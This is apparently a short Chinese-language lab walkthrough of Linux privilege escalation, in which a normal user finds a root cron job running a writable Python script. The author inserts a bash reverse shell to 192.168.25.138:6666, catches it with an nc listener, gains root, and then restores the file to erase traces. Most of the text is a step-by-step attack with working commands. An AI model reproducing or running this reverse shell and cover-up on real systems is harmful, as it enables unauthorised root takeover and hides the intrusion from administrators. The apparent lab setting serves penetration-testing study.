实验环境还是一样的

当获取一个linux普通用户的时，查看计划任务

首先我们退出root用户

cat /etc/crontab

crontab -l

查看当前用户命令

/var/spool/cron/crontabs/root

这个目录是root任务文件 默认是不是root权限是 看不到

tail -f /var/log/syslog

咋们切换用户web1

查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

然后复制一份文件 到tmp目录 用于修改回来

cp /script/cleanup.py /tmp/cleanup.py

然后我们修改

/script/cleanup.py

这个.py文件

bash -i >& /dev/tcp/192.168.25.138/6666 0>&1

然后在kail新建窗口 开启监听

nc -lvnp 6666

等待计划任务执行

现在返回shell

root

提权成功

然后我们消除痕迹 我们把原来的文件修改回来 就好了